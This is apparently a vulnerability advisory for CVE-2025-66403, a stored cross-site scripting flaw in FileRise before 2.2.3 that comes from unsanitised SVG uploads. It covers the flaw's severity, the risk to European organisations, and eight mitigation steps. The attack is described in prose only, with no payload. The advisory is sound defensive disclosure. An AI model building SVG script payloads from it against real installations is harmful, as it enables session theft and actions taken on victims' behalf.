CVE-2025-66403 is a stored cross-site scripting vulnerability identified in the FileRise web-based file manager application, specifically in versions prior to 2.2.3. FileRise allows users to upload and manage files, including SVG images. SVG files are XML-based and can embed JavaScript or event-driven payloads. The vulnerability stems from FileRise's failure to properly sanitize or restrict scripts embedded within uploaded SVG files. When a malicious SVG containing inline JavaScript is uploaded, it is stored on the server and later rendered directly in the user's browser when accessed through the application interface. Because the SVG executes in the same origin context as the application, this enables attackers to execute arbitrary scripts, potentially stealing session tokens, manipulating the DOM, or performing actions on behalf of the user. Exploitation requires the attacker to have authenticated access to upload malicious SVGs and for a victim user to view the infected file, indicating user interaction is necessary. The CVSS v3.1 base score is 4.6, reflecting low complexity of attack but limited impact scope (confidentiality and integrity partial impact, no availability impact). No known exploits have been reported in the wild as of the published date. The vulnerability is resolved in FileRise version 2.2.3, which implements proper sanitization or restrictions on SVG uploads to prevent script execution. This vulnerability is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation).

For European organizations using vulnerable versions of FileRise, this stored XSS vulnerability poses a moderate risk primarily to confidentiality and integrity. Attackers with authenticated access can upload malicious SVG files that execute scripts in the context of other users, potentially leading to session hijacking, unauthorized actions, or data theft within the application. While availability is not impacted, the breach of user trust and potential data leakage can have regulatory and reputational consequences, especially under GDPR requirements. Organizations with sensitive or regulated data managed via FileRise are at higher risk. The requirement for authentication and user interaction limits the attack surface but does not eliminate risk, particularly in environments with multiple users or less stringent access controls. The lack of known active exploits reduces immediate threat but patching remains critical to prevent future exploitation. The impact is more pronounced in sectors relying on FileRise for collaborative file management, such as legal, financial, and governmental institutions in Europe.

1. Upgrade all FileRise instances to version 2.2.3 or later immediately to apply the official fix that sanitizes SVG uploads. 2. Implement strict file upload policies that restrict or disallow SVG files unless absolutely necessary. If SVG uploads are required, use server-side SVG sanitization tools (e.g., SVG sanitizers that remove scripts and event handlers) before storing or rendering files. 3. Enforce least privilege access controls to limit who can upload files, reducing the risk of malicious uploads. 4. Educate users to be cautious when viewing uploaded SVG files and monitor for unusual file uploads or user behavior. 5. Employ Content Security Policy (CSP) headers to restrict script execution contexts and mitigate impact of any injected scripts. 6. Regularly audit and monitor FileRise logs for suspicious activity related to file uploads and access. 7. Consider isolating the FileRise application in a segmented network zone to limit lateral movement if compromise occurs. 8. Review and update incident response plans to include scenarios involving stored XSS attacks in file management applications.